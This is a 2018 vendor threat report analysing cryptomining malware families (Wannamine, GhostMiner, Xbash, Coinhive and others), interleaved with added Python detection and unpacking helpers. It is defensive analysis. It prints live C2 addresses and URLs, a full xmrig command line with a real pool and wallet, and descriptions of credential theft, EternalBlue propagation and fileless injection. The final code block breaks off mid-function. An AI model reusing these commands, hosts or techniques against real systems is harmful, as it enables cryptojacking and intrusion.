Top 10 Cryptomining Malware VERSA NETWORKS TOP 10 REPORT FOR 2018


2018 TOP 10 CRYPTOMINING MALWARE

Cryptomining

In cryptomining, one uses computer resources, such as CPU cycles, to “mine” the currency. Cryptocurrency has become a sought-after way to make an easy profit, which means Internet users have one more thing to look out for alongside the rise in ransomware attacks. The trend in 2017 saw numerous ransomware campaigns which attacked systems by encrypting files and withholding the decryption key in exchange for ransom. This year, there is a shift toward cryptomining/cryptojacking attacks1,2, especially with the increase in cryptocurrency market rates. We will examine how mining works, and its underlying technology, blockchain.

How Cryptomining Works

Cryptocurrencies were developed to allow payments in an untrusted environment without depending on a third party, relying only on cryptographic proof. The cryptographic proof involves mathematical operations that make it computationally impractical to reverse or modify transactions in order to profit or to allow double spending. Cryptocurrency became popular with the introduction of Bitcoin3, which proposed to implement electronic transactions based on cryptography, with blockchain as the underlying technology. Bitcoin uses blockchain as a decentralized, distributed ledger on a peer-to-peer network to validate transactions and prevent double spending.

Blockchain works like a storage system for the transactions. Transactions are collected into blocks, and each block is appended to the previous ones to build the chain. Since the ledger and the new transactions are available to all parties on the network, they can be validated by all, and cannot be altered without a majority of the network’s members. In the block structure implemented by Bitcoin, the main components are the hash of the previous block, the transaction details, and a nonce. Since it is impractical to carry the data of all earlier transactions in each block, a hash of the existing chain is calculated and included as an element in the next block. It also works as a link to the previous block for navigating the chain.

In 2017, cryptocurrency mining detections climbed from around 75,000 detections in the first half of the year to about 326,000 in the second half. Compared to the previous half year, the first half of 2018 saw a 141-percent increase in cryptocurrency mining detections.1


Fig #1: Blockchain Representation (three linked blocks, each holding Previous Hash, Transaction Details, Nonce)

All transactions using bitcoins are broadcast to the network. The members create a block by collecting these transactions, and validate the transactions by solving a cryptographic problem to commit that block to the chain. The block is verified by a majority of the members in the network before being committed to the blockchain. The numerous cryptocurrencies arise from the different consensus algorithms they use to implement validation, like proof of work, proof of stake, etc. Most cryptocurrencies implement proof of work, which requires members to spend a significant amount of CPU cycles to solve the block; as an incentive, the members receive an amount of cryptocurrency. This process is called mining, and the members verifying the transactions are the miners.

Bitcoin employs Hashcash4 proof of work. This algorithm requires the miners to find a block whose hash value begins with a specific number of zeros. The miners create a block by collecting the pending transactions along with the previous hash of the chain and a nonce. The systems in the network then change the nonce until they achieve a hash of the required form, which indicates the proof of work spent by the system. The first system to achieve the proof of work broadcasts its nonce and hash to the rest of the network for verification. If the nodes verify the submitted hash, they start working on the next block with the new hash.

These blocks are chained together as future transactions are added. Altering a transaction in an earlier block requires redoing the proof of work for that block and every block after it, which takes an enormous amount of CPU power. As long as a majority of the systems in the network are not corrupted, an attacker cannot pool enough CPU power to alter a previous transaction and create a competing branch of the chain.
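The Hashcash-style proof of work and chain linking described above, as an added illustration that is not code from the Versa report: each block carries the previous hash, the transaction details and a nonce (the Fig #1 structure), the nonce is iterated until the SHA-256 digest starts with the required zeros, and re-validating the chain shows why tampering with an old block invalidates every later one. The transactions and difficulty are constructed.

```python
"""Toy Hashcash-style proof of work over the block structure in Fig #1
(previous hash, transaction details, nonce). Added illustration, not code
from the Versa report; the difficulty and transactions are constructed."""
import hashlib
import json

GENESIS_HASH = "0" * 64  # constructed: the first block has no predecessor


def block_hash(prev_hash: str, transactions: list, nonce: int) -> str:
    """SHA-256 of a canonical serialisation of the three block fields."""
    payload = json.dumps(
        {"prev": prev_hash, "tx": transactions, "nonce": nonce},
        sort_keys=True, separators=(",", ":"),
    ).encode()
    return hashlib.sha256(payload).hexdigest()


def meets_target(digest: str, difficulty: int) -> bool:
    """Hashcash target: the hex digest must begin with `difficulty` zeros."""
    return digest.startswith("0" * difficulty)


def mine(prev_hash: str, transactions: list, difficulty: int, max_tries: int = 10_000_000):
    """Iterate the nonce until the hash meets the target; this search is the
    CPU work the report calls mining. Returns (nonce, digest)."""
    for nonce in range(max_tries):
        digest = block_hash(prev_hash, transactions, nonce)
        if meets_target(digest, difficulty):
            return nonce, digest
    raise RuntimeError("no nonce found within max_tries")


def verify(prev_hash, transactions, nonce, claimed_digest, difficulty) -> bool:
    """What every other node does when a nonce is broadcast: one hash, not a search."""
    digest = block_hash(prev_hash, transactions, nonce)
    return digest == claimed_digest and meets_target(digest, difficulty)


def build_chain(tx_batches, difficulty):
    """Mine consecutive blocks; each block's hash becomes the next block's prev."""
    chain = []
    prev = GENESIS_HASH
    for txs in tx_batches:
        nonce, digest = mine(prev, txs, difficulty)
        chain.append({"prev": prev, "tx": txs, "nonce": nonce, "hash": digest})
        prev = digest
    return chain


def chain_is_valid(chain, difficulty) -> bool:
    """Re-check every link; altering an old transaction breaks that block's hash
    and therefore the prev pointer of every block after it."""
    prev = GENESIS_HASH
    for blk in chain:
        if blk["prev"] != prev or not verify(prev, blk["tx"], blk["nonce"], blk["hash"], difficulty):
            return False
        prev = blk["hash"]
    return True


if __name__ == "__main__":
    batches = [["alice->bob:5"], ["bob->carol:2", "carol->dave:1"]]  # constructed
    chain = build_chain(batches, difficulty=4)
    print("valid:", chain_is_valid(chain, 4))
    chain[0]["tx"][0] = "alice->bob:50"  # tamper with history
    print("valid after tampering:", chain_is_valid(chain, 4))
```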

Cryptocurrency mining requires a person to have a cryptocurrency wallet, the mining hardware/software to mine, electricity, and Internet connectivity. The mining software solves the cryptographic hash and provides the bookkeeping service to track the transactions. Thus, the miners need electricity and resources to convert into the cryptocurrency. The difficulty of finding the hash is varied at intervals, depending on factors like the number of miners in the network. The rate at which a mining machine operates is defined as the hashrate. As difficulty increases, the hashrate also needs to be increased to mine efficiently. Initially, bitcoin mining software was run on CPUs, but to increase the hashrate, miners upgraded to GPUs, followed by FPGAs. But the high power consumption of FPGAs became unprofitable, giving way to Application-Specific Integrated Circuits (ASICs), which were developed with the sole use of mining in mind5.

The methods of mining have also evolved beyond just using one’s own hardware. Miners have started joining data centers that host mining software, and use cloud resources to mine coins. To keep up with the high computational power requirement, miners now pool their resources to work on a hash problem and split the cryptocurrency mined. The Bitcoin algorithm for finding the hash is more computationally intensive, so many other currencies have come up with less complex hashing algorithms that work efficiently on a CPU alone, and these have gained popularity after Bitcoin.

All of this requires an initial investment in hardware or power. Attackers have resorted to hijacking other users’ resources for their mining process, without detection. This illicit method of cryptomining is called cryptojacking. In cryptojacking, the miner software consumes a high share of the CPU, preventing the system from allocating CPU time to its legitimate processes and leading to overheating. Many security firms are vigilant about detecting the presence of mining software to prevent its execution. We will look into some of the cryptomining incidents of 2018 in the following report.


Cryptomining Malware

Cryptocurrency has become the latest trend in the cyber world, and no time has been wasted in exploiting its features to earn a quick profit. As seen in the reports from 1,2, cryptomining is all the talk for 2018. The campaigns indicate that attackers target a wide range of sources, from large data centers, like Tesla’s Cloud6, to mobile devices and IoT devices. In short, any device that can provide CPU cycles and electricity is vulnerable. There were also recent reports on the increase in mining activities on iOS devices7. We also see a variety of miners and the varied techniques the attackers use to distribute them, as well as to evade detection. Here we look at some campaigns and miners in 2018.

Distribution Mechanisms and Evasion Techniques

Cryptomining is exploited via different methods by the attackers to achieve a profit. There are malware families that drop the mining software as their payload. These payloads are dropped onto the victim machine and executed to use the victim’s CPU cycles to mine and fill the attacker’s wallets. Some pre-existing malware, with other payloads like information stealers, incorporates mining components as secondary payloads, which lets the miners spread along with other infections. On analyzing some samples, it was seen that the general techniques involve using known vulnerabilities to deliver the miner payload to servers, using PowerShell or shell scripts to download the miners, or performing lateral movement to spread the infection within a network.

One of the methods that is being implemented on a wide scale is browser-based mining, which the introduction of the Coinhive8 mining API popularized. The technology, as such, is not malicious, but running it without the user’s knowledge makes it malicious. It allows sites to make money by running mining scripts on the website instead of displaying advertisements. But many sites have switched to mining without informing their users. This method is also exploited by attackers on compromised websites, where even the website owner is unaware of the script running and draining the visitor’s resources.

Some recent reports have identified a cryptominer that targets Linux systems with an interesting feature in the form of a rootkit component9, and another Windows-based miner that disguises itself as a Windows Installer file10. Rootkits allow malicious programs to be hidden from monitoring tools, which helps the miner process evade detection. However, a rootkit cannot hide the performance degradation or high CPU usage commonly seen when a miner executable is running: the system shows maximum CPU utilization, but the rootkit keeps the process responsible for the surge from being identified. In the case of the MSI file, being a Windows Installer package, it is not immediately suspected and can evade some security filters. The file installs a number of files, including scripts to delete anti-malware processes as well as files to support the installation of the miner. The report also mentions the use of the Windows Installer Builder WiX as a packer to further obfuscate the file. Similarly, attackers explore many obfuscation methods, like encoding, compression, and adding junk bytes and instructions, to modify files and evade detection.


Web Based Cryptomining11

Monero mining uses CryptoNight as the underlying mining algorithm, which opened the possibility of porting the algorithm to JavaScript for use on an ordinary PC, unlike algorithms that run efficiently only on ASICs. This gave rise to the possibility of mining within any browser that supports JavaScript, which appeals to attackers because of the ease of deploying these miners. Traditional miners have to be dropped inconspicuously onto the victim machine and also need persistence techniques to ensure a long run, while web-based mining only requires injecting the code into a website: when a victim visits the site, CPU cycles are stolen to mine currency for the attacker’s wallet. The drawback of web-based mining is that it is inefficient compared to a miner executable, and it only runs while the page containing the mining script is open in the browser. The WebAssembly (Wasm)12 technology solves this to an extent. It is a binary instruction format for stack-based virtual machines, and works as a compilation target for high-level languages like C/C++ to be deployed in web-based client/server applications. It also aims at near-native execution speed, and is thus an appealing way to implement the miner code. Web-based cryptomining was popularized with the introduction of Coinhive, followed by many similar web-based miners like Cryptoloot13, CoinImp14, etc.

The mining malware distribution went up with the increase in cryptocurrency value, especially when teamed with the easy availability of a browser-based miner that does not require attackers to inject the miner executables into a system. The attackers only had to redirect the victims to the infected websites.

Wannamine

Even after the havoc created by the Wannacry ransomware, many devices still remain unpatched, making them vulnerable to exploitation. Wannamine, a cryptomining malware that uses the same SMB vulnerability, is still found to be prevalent15. Wannamine mines Monero, and usually infects a system through phishing emails or downloads from compromised websites. The malware infects a system and makes use of WMI, as well as PowerShell, to run Mimikatz and get the login details of other systems in the network. It also attempts to infect others in the network through the SMB vulnerability that allowed the spread of Wannacry. Upon analysis of some samples of the Wannamine malware, we were able to see that the files in the initial stage of infection are large ASCII text files. They include large strings obfuscated with various techniques, including base64 encoding. These strings turned out to be PowerShell scripts which, on de-obfuscation, expose commands that use WMI, and also contain the executable of the Monero miner as well as the Mimikatz tool.

Lifecycle

The sample 28287cbcdfde7fb90d504e658520a7b63c9a65640a96456e551ebda1c1ac73ee is a large ASCII text file with a variable fa holding a base64 string, as well as another long obfuscated string. On de-obfuscation of the string, we get a PowerShell script. It has a command to split the string fa into funs, mimi, mon, sc, vcr, vcp.


Fig 1: Script to split string into components

The script uses a WMI object to check whether the system architecture is 64-bit; if not, it downloads a PowerShell script from 195[.]22.127.157:8000 or 93[.]174.93.73:8000.

Fig 2: Check for 64-bit OS

It creates a new management class with scope root\default, named ‘Win32_Services’, and adds the properties mimi, mon, vcp, vcr, funs, sc, ipsu and i17. The script decodes the base64 of funs to get the script that contains the functions, and executes it.

The main script then checks for the files msvcp120.dll and msvcr120.dll. If they are not present, it places the files vcp and vcr obtained after de-obfuscation in that location, which allows us to conclude that vcp and vcr are the corresponding DLLs required for proper execution of the script.

Fig 3: DLL required for execution of executable

The script checks the WMI filter-to-consumer binding objects and removes any that do not contain “DSM Event Log”. The malware can make use of WMI events to achieve persistence on the system. A WMI event subscription requires a filter to query, a consumer to define what action is to be taken, and a binding to associate the filter with the consumer.


Fig 4: Commands to create WMI event

The script also enumerates the list of TCP connections, checks whether a foreign address uses port 3333 or 5555 and whether that connection is established, and if so adds the process id to a list and stops the process. Ports 3333, 5555 and 7777 are among the ports most commonly used for mining, so this check looks for other mining processes that might already be running. It also checks all processes to see whether any is running PowerShell, and whether any process is listed with an established TCP connection from port 80. If these conditions pass, it sets a flag. The script then starts PowerShell with the noprofile, non-interactive and hidden-window options, decodes funs from base64, executes it, and calls the Invoke-Command cmdlet with mon as the argument. These commands run the miner from within PowerShell.

Fig 5: Command to run scripts that call miner executable

The other portions of the string call a get-creds function to obtain credentials of systems on the same network as the infected system. Using these credentials, the malware infects other systems through the EternalBlue vulnerability.


Fig 6: Loop checking IPs for eternal-blue vulnerability for infection.

Fig 7: FlexVNF AV Detection of Wannamine Samples

MIRUS

MIRUS is an example of a virus infection, but it was reported to also contain the functionality of injecting cryptomining scripts16. One of its functions is to infect specific files on a system with a virus by prepending malicious code to them. In addition, it searches for html and htm files to inject a JavaScript snippet that calls the Coinhive miner. When these html files are opened, the JavaScript executes and connects to Coinhive. The coinhive.min.js script it loads uses the CPU cycles to mine and collect the currency in the wallet specified in the script.


Fig 8: Coinhive script to be appended to html files

Fig 9: List of file types Mirus targets

Fig 10: FlexVNF AV detection

GhostMiner

Fileless malware is another buzzword. GhostMiner, a Monero cryptominer, was first seen in March 2018, and exhibits fileless evasion. The miner malware achieves this with PowerShell evasion frameworks, like Out-CompressedDll and Invoke-ReflectivePEInjection. According to a report when the malware was discovered, the wallet linked to the campaign had only collected 1.03 XMR17. Even though the miner only mined a small amount, the techniques used by the malware were advanced in trying to achieve fileless execution.

We began our analysis with the IOC of the C2 IP address 123[.]59[.]68[.]172 in VirusTotal. A search on the passive DNS queries showed it downloads four files, of which two are detected as malicious. The malicious files were 32-bit binaries flagged as coinminers by most engines.

We analyzed three PowerShell scripts related to this attack:

Neutrino.ps1/Nitro.ps1 : 9a326afeeb2ba80de356992ec72beeab28e4c11966b28a16356b43a397d132e8

WMI.ps1 : 40a507a88ba03b9da3de235c9c0afdfcf7a0473c8704cbb26e16b1b782becd4d

WMI64.ps1 : 8a2bdea733ef3482e8d8f335e6a4e75c690e599a218a392ebac6fcb7c8709b52

All three PowerShell scripts employ a similar Out-CompressedDll technique to evade detection by antivirus engines. The technique takes a PowerShell script, compresses it, and base64-encodes the result; it was initially successful in evading the security tools of many vendors.


On de-obfuscating Nitro.ps1, we get a PowerShell script with code that implements Invoke-ReflectivePEInjection, which allows base64-encoded data to be passed as the PE/DLL to be injected into a process. The reflective injection technique loads the PE/DLL into another process directly from memory, without writing the executable to disk, thereby avoiding detection by many monitoring tools that track file writes. The base64-encoded data is decoded to obtain a DLL.
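An unpacker for the compress-then-base64 wrapper described in the two paragraphs above, as an added analysis example that is not code from the Versa report or from the GhostMiner scripts: it finds base64 runs in a script, inflates them (raw Deflate as .NET DeflateStream writes it, with zlib and gzip as fallbacks), recurses into what it recovers, and scans every layer for the indicators the report discusses. The wrapped sample is built inside the block and is a constructed stand-in, not the real Nitro.ps1; the `-PEBytes` parameter name is PowerSploit's and is used only in that constructed text.

```python
"""Unpacker for the compress-then-base64 wrapper the GhostMiner scripts use
(Out-CompressedDll style: DeflateStream over FromBase64String), followed by a
scan of the recovered layers for the indicators the report discusses.
Added example, not code from the Versa report; the wrapped sample is constructed."""
import base64
import re
import zlib

# Base64 runs long enough to be a payload rather than a short option value.
B64_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
# Strings the report associates with GhostMiner's staged scripts (WMI class
# names are the standard event-subscription classes the persistence uses).
INDICATORS = ["Invoke-ReflectivePEInjection", "FromBase64String", "DeflateStream",
              "stratum+tcp://", "__EventFilter", "__FilterToConsumerBinding"]


def inflate(blob: bytes):
    """Try the stream formats .NET callers commonly produce: raw Deflate, zlib, gzip."""
    for wbits in (-15, 15, 31):
        try:
            return zlib.decompress(blob, wbits)
        except zlib.error:
            continue
    return None


def unwrap(text: str, depth: int = 0, max_depth: int = 4):
    """Decode + inflate every base64 run in `text` and recurse into the result.
    Returns (depth, recovered) pairs; binary payloads such as the injected DLL
    are reported by size rather than content."""
    layers = []
    if depth >= max_depth:
        return layers
    for m in B64_RE.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:
            continue
        inflated = inflate(raw)
        if inflated is None:  # plain base64 (e.g. the DLL handed to the injector)
            inflated = raw
        try:
            inner = inflated.decode("utf-8")
        except UnicodeDecodeError:
            inner = None
        if inner is None or "\x00" in inner:
            layers.append((depth + 1, "<binary blob, %d bytes>" % len(inflated)))
            continue
        layers.append((depth + 1, inner))
        layers.extend(unwrap(inner, depth + 1, max_depth))
    return layers


def scan(text: str):
    """Return the report indicators present in one layer."""
    return [ind for ind in INDICATORS if ind in text]


def analyze(wrapper_script: str):
    """Unwrap all layers and collect indicators; the outer wrapper alone reveals little."""
    findings = {"layers": 0, "indicators": set(scan(wrapper_script))}
    for _depth, content in unwrap(wrapper_script):
        findings["layers"] += 1
        findings["indicators"].update(scan(content))
    return findings


def build_constructed_sample() -> str:
    """Produce a wrapper in the Out-CompressedDll shape around a constructed inner
    script (a stand-in for the deobfuscated Nitro.ps1); nothing here is live code."""
    fake_pe = base64.b64encode(b"MZ" + b"\x00" * 62 + b"CONSTRUCTED-NOT-A-REAL-PE").decode()
    inner = ("$bytes = [Convert]::FromBase64String('%s')\n"
             "Invoke-ReflectivePEInjection -PEBytes $bytes\n"
             "$pool = 'stratum+tcp://pool.invalid:3333'\n") % fake_pe
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw Deflate, like .NET DeflateStream
    deflated = comp.compress(inner.encode()) + comp.flush()
    b64 = base64.b64encode(deflated).decode()
    return ("$EncodedCompressedFile = '%s'\n"
            "$DeflatedStream = New-Object IO.Compression.DeflateStream("
            "[IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile),"
            "[IO.Compression.CompressionMode]::Decompress)\n") % b64


if __name__ == "__main__":
    sample = build_constructed_sample()
    for depth, content in unwrap(sample):
        print("layer", depth, "->", content[:60].replace("\n", " | "))
    print(analyze(sample))
```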

Fig 11: Calling Reflective PE Injection with base64 encoded data.

Analyzing the DLL showed two other addresses, VoidFunc and ShellMain, within its export list, apart from the Dll entry Point. The Reflective PE Injection command calls the VoidFunc, which calls ShellMain with argument “http://123.59.68.172/Cache/Tunnel.php” in the stack. The ShellMain is the main function in the DLL that is used to find the servers for exploiting and spreading the infection. The strings “CrackWebLogic”, “CrackSQL”, and a list of strings resembling commonly used passwords, further suggest the executable tries brute-forcing the password to gain access to poorly protected systems.

WMI.ps1, once decompressed and Base64 decoded, results in a powershell script that has commands to connect the miner to the mining pool, and also achieves persistence with the help of WMI objects.

Fig 12: Commands creating WMI events

The file “lsass.exe” downloaded from 123[.]59[.]68[.]172 acts as the miner executable, while the script will initiate its execution with the mining pools with the cryptowallet details.

Fig 13: Miner executable


Fig 14: Commands connecting the executable to the mining pool

The payload also contains a module named Killer, to kill other cryptomining processes running in the system. It checks for lists of services, scheduled tasks, and command-line arguments that are commonly seen in commands invoking miners. It will search for processes that establish TCP connections with , usually used by cryptominers to communicate with mining pools and popular miner executables.

Fig 15: Processes and services targeted by Killer component

WMI64.ps1 has similar modules to create the Miner and Killer, but targets 64-bit OS. It checks whether the OS is 64-bit before continuing with its execution. The decompressed script holds an obfuscated string in a variable that is a 64-bit executable of the XMRig miner. The executable also contains strings that point to the same cryptowallets and mining pools.


Fig 16: Strings present in 64-bit miner executable

Fig 17: FlexVNF AV detection

Fake Flash Updates

Using Flash Updates to distribute cryptominer executables is among the recent campaigns in cryptojacking. This was reported along with a list of sample executables and collected IOC18. Though there were many previous attempts to hide different malware in Flash updates, this particular case stood out. It had legitimate looking Adobe popups for installation, along with updating Flash player to the latest version. These smokescreens easily lull the unsuspecting user.

In analyzing a sample, it shows that the primary executable drops two executables. The binary for the executable is present within the initial executable, which gets extracted to a temp folder, and written to the path %appdata%\Roaming\xbooster\Manager.exe and %appdata%\Roaming\xbooster\xmrig.exe. The primary executable creates the process for the xmrig.exe, and exits while the rest of the mining and communication is carried out by xmrig.exe.

The command “C:\Users\<USER>\AppData\Roaming\xbooster\xmrig.exe -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRzL9pCSYqvM4EaC4kh/2 -p x --donate-level=1 -B --max-cpu-usage=90 -t 1” executes xmrig.exe with the login parameters as command line arguments.

This tries to connect with the mining pool with the given login parameters. The packet capture during the execution shows the communication of miner process with the pool. The miner software connects with the mining pool, communicating over port 14444 throughout its execution.

Fig 18: Pcap showing connection to miner pool

The exchange is in JSON format, and shows an initial login request and reply, followed by requests for new miner jobs. The presence of placeholder strings for the keepalive and submit methods indicates further communication. The executable replies to keepalive requests from the mining pool, and sends a submit request with the nonce that produces the hash answer for the proof-of-work challenge, to be verified by the rest of the systems in the mining network.

Fig 19: Strings in miner executable indicating communication with miner pools
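The pool conversation and command line described above, as added detection helpers that are not code from the Versa report: one function pulls pool host, port and wallet out of an xmrig-style command line, one labels Stratum JSON-RPC lines (login, job, submit, keepalived), and one flags established connections to the pool ports the report names (3333/5555/7777 in the Wannamine section, 14444 here), which is the same check Wannamine's own script performs against rival miners, turned to defensive use. The command line, capture lines and connection rows are constructed; the wallet is a placeholder.

```python
"""Detection helpers for miner-to-pool behaviour: xmrig-style command line,
Stratum JSON exchange, and connections to the pool ports the report lists.
Added example, not code from the Versa report; all sample data is constructed."""
import json
from urllib.parse import urlparse

# Ports the report names as commonly used for pool traffic.
MINING_PORTS = {3333, 5555, 7777, 14444}
# Stratum methods the report mentions: login, job, keepalive, submit.
STRATUM_METHODS = {"login", "job", "keepalived", "submit"}


def parse_miner_cmdline(cmdline: str) -> dict:
    """Pull pool host/port, wallet and CPU cap out of an xmrig-style command line."""
    tokens = cmdline.split()
    info = {"exe": tokens[0], "pool_host": None, "pool_port": None,
            "wallet": None, "max_cpu": None}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok == "-o" and i + 1 < len(tokens):
            target = tokens[i + 1]
            url = urlparse(target if "://" in target else "stratum+tcp://" + target)
            info["pool_host"], info["pool_port"] = url.hostname, url.port
            i += 2
        elif tok == "-u" and i + 1 < len(tokens):
            info["wallet"] = tokens[i + 1]
            i += 2
        elif tok.startswith("--max-cpu-usage="):
            info["max_cpu"] = int(tok.split("=", 1)[1])
            i += 1
        else:
            i += 1
    return info


def classify_stratum_line(line: str):
    """Label one line of a captured pool conversation, or None if it is not Stratum."""
    try:
        msg = json.loads(line)
    except ValueError:
        return None
    if not isinstance(msg, dict):
        return None
    method = msg.get("method")
    if method in STRATUM_METHODS:
        return "stratum:" + method
    result = msg.get("result")
    if isinstance(result, dict) and ("job" in result or "blob" in result):
        return "stratum:login-reply"  # pool answers the login with the first job
    return None


def summarize_capture(lines):
    """Count Stratum message types; login followed by job/submit traffic is the
    pattern the report's pcap shows."""
    counts = {}
    for line in lines:
        label = classify_stratum_line(line)
        if label:
            counts[label] = counts.get(label, 0) + 1
    return counts


def flag_connections(records):
    """From netstat-style rows 'proto local remote state process', return the
    (process, remote) pairs with an ESTABLISHED connection to a known pool port."""
    flagged = []
    for row in records:
        parts = row.split()
        if len(parts) < 5:
            continue
        proto, _local, remote, state, proc = parts[:5]
        try:
            port = int(remote.rsplit(":", 1)[1])
        except (IndexError, ValueError):
            continue
        if proto.lower() == "tcp" and state.upper() == "ESTABLISHED" and port in MINING_PORTS:
            flagged.append((proc, remote))
    return flagged


if __name__ == "__main__":
    # Constructed to mirror the shape of the command line quoted above.
    cmd = (r"C:\Users\victim\AppData\Roaming\xbooster\xmrig.exe -o stratum+tcp://pool.example:14444 "
           "-u WALLET_PLACEHOLDER -p x --donate-level=1 -B --max-cpu-usage=90 -t 1")
    print(parse_miner_cmdline(cmd))
    capture = [  # constructed Stratum exchange, one JSON object per line
        '{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"WALLET_PLACEHOLDER","pass":"x"}}',
        '{"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"s1","job":{"blob":"00","job_id":"j1"},"status":"OK"}}',
        '{"jsonrpc":"2.0","method":"job","params":{"blob":"01","job_id":"j2","target":"ffff"}}',
        '{"id":2,"jsonrpc":"2.0","method":"submit","params":{"id":"s1","job_id":"j2","nonce":"deadbeef"}}',
        '{"id":3,"jsonrpc":"2.0","method":"keepalived","params":{"id":"s1"}}',
        "GET / HTTP/1.1",
    ]
    print(summarize_capture(capture))
    conns = [  # constructed connection table
        "tcp 10.0.0.5:50322 203.0.113.9:14444 ESTABLISHED xmrig.exe",
        "tcp 10.0.0.5:50323 203.0.113.10:443 ESTABLISHED chrome.exe",
        "tcp 10.0.0.5:50324 203.0.113.11:3333 SYN_SENT powershell.exe",
    ]
    print(flag_connections(conns))
```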

The CPU consumption of the system stays at a constant peak above 90% for the process xmrig.exe. This would lead to degradation of system performance, and prevent other legitimate processes from getting CPU time for their execution.

Fig 20: The executable drops the files in temp folder and causes CPU to surge to above 90%


Fig 21: FlexVNF AV detection

Xbash

A recently discovered malware family, Xbash, targets both Linux and Windows servers16. The findings show it was developed in Python, and it combines ransomware, mining, and botnet functionality, as well as self-propagation techniques.

As part of a Linux infection, the file r88.sh is a bash script that checks whether root privilege is present and, depending on the result, downloads either the lowerv2.sh or the rootv2.sh bash script. If it has root privileges, it also schedules cron jobs of itself.

Both scripts contain commands to kill a list of processes, like rival cryptominers and processes using specific ports, and to remove the related files. The following files can then be downloaded: Config.json; Bashf: Pools.txt; Bashg: XbashY/xapache, both 64-bit ELF binaries.

Fig 22: Script to kill mining process


In the case of a Windows infection, we looked at f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8, which was a jscript that ran a powershell command to download tg.jpg and execute it.

Fig 23: Obfuscated script to run powershell.

One of the samples, 725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054 (reg9.sct) contains an encoded command in powershell, which on execution schedules tasks with name “Update”.

Another sample d7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6, is a PNG file appended with a base64 encoded executable, which contains strings associated with miner executables, like the json string placeholder to submit hashes. Similarly, the sample ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50 is a dll that contains code references similar to miner executables.

Fig 24: FlexVNF AV detection


CoinHive

Coinhive is a web-based cryptominer that uses JavaScript to perform mining operations. JavaScript-invoking miners can be placed on websites, and when a browser visits the site, it uses the system CPU to perform mining. Of the total earnings mined, 30 percent goes to Coinhive, and the rest is received by the wallet specified in the script. Piratebay initially experimented with Coinhive to mine instead of monetizing through advertisements. Some charity websites also host it, but with disclosure that the CPU is used for mining. Coinhive scripts were also seen in Google’s DoubleClick20; the affected page showed the miner script along with the script to display the actual advertisement. A lot of streaming sites also host it, as users spend a long time on such sites.

Fig 25: Captcha to achieve proof of work

Fig 26: Example javascript template that is usually injected into website for mining.

Cryptoloot

Cryptoloot is very similar to Coinhive. The major difference is that Cryptoloot only keeps 12 percent of the mined coins, and gives the rest to the website owners, compared to Coinhive’s 30 percent take. Cryptoloot advertises itself as stealthy and un-intrusive. It uses crypto-loot.com and cryptoloot.pro as domains for its operations. As per Checkpoint reports, it is among the top cryptomining threats after Coinhive2.

Some of the major campaigns within web-based mining include capitalizing on vulnerabilities in CMS websites to host the script, using obfuscated short links to the Coinhive miner. Another major attack in this category involves unpatched Mikrotik routers compromised to push pages with miner scripts. In this case, all the browsers behind the infected router mine, because the router itself injects the miner script into the pages they load.

Shortlink Coinhive URL

A campaign using a shortlink of the Coinhive URL was reported21. Coinhive offers website owners the option of a shortlink that mines with the visitor’s CPU while forwarding them to another site.


Fig 27: Example Coinhive shortlink5

This was misused by injecting the shortlink into an iframe of size 1x1, which a normal user easily misses while the miner runs in the background. A shortlink, by nature, does not reveal the exact page it leads to until the browser loads it, and thus can misdirect users into clicking it, allowing malicious sites to be loaded. Researchers went on to find a larger operation which not only catered to drive-by mining, but also directed users to fake download pages that dropped miner executables for Linux or Windows22.
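A scanner for the browser-mining injections described in the web-based mining, MIRUS, Coinhive, Cryptoloot and shortlink sections above, as an added example that is not code from the Versa report: it walks a directory for the .html/.htm files MIRUS rewrites and flags the coinhive.min.js loader, the CoinHive miner API call, the Cryptoloot domains the report names, and 1x1 or hidden iframes carrying a shortlink. The sample pages are constructed; cnhv.co is assumed from memory to be Coinhive's shortlink domain, and the site key is a placeholder.

```python
"""Scanner for injected browser-mining code in HTML files: Coinhive loader and
API call, Cryptoloot domains, and hidden 1x1 iframes carrying a shortlink.
Added example, not code from the Versa report; sample pages are constructed and
the cnhv.co shortlink domain is an assumption."""
import os
import re
import tempfile

# Loader hosts, script names and API calls the report ties to browser mining.
MINER_MARKERS = {
    "coinhive-loader": re.compile(r"coinhive\.min\.js", re.I),
    "coinhive-api": re.compile(r"CoinHive\.(Anonymous|User)\s*\(", re.I),
    "cryptoloot-domain": re.compile(r"crypto-loot\.com|cryptoloot\.pro", re.I),
    "coinhive-shortlink": re.compile(r"https?://cnhv\.co/", re.I),  # assumed domain
}
SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc\s*=\s*[\"']([^\"']+)[\"']", re.I)
IFRAME = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR = re.compile(r"(\w+)\s*=\s*[\"']?([^\"'\s>]+)")


def _is_hidden_iframe(attrs: str) -> bool:
    """1x1 or display:none iframes are how the shortlink campaign hid the miner."""
    a = {k.lower(): v for k, v in ATTR.findall(attrs)}
    tiny = a.get("width") in ("0", "1") and a.get("height") in ("0", "1")
    hidden = "display:none" in attrs.replace(" ", "").lower()
    return tiny or hidden


def scan_html(text: str, name: str = "<inline>"):
    """Return (name, rule, evidence) tuples for every miner indicator in one page."""
    hits = []
    for rule, rx in MINER_MARKERS.items():
        m = rx.search(text)
        if m:
            hits.append((name, rule, m.group(0)))
    for src in SCRIPT_SRC.findall(text):
        if any(rx.search(src) for rx in MINER_MARKERS.values()):
            hits.append((name, "external-script", src))
    for attrs in IFRAME.findall(text):
        if _is_hidden_iframe(attrs):
            src = {k.lower(): v for k, v in ATTR.findall(attrs)}.get("src", "")
            hits.append((name, "hidden-iframe", src))
    return hits


def scan_tree(root: str):
    """Walk a directory for .html/.htm files (the types MIRUS rewrites) and scan each."""
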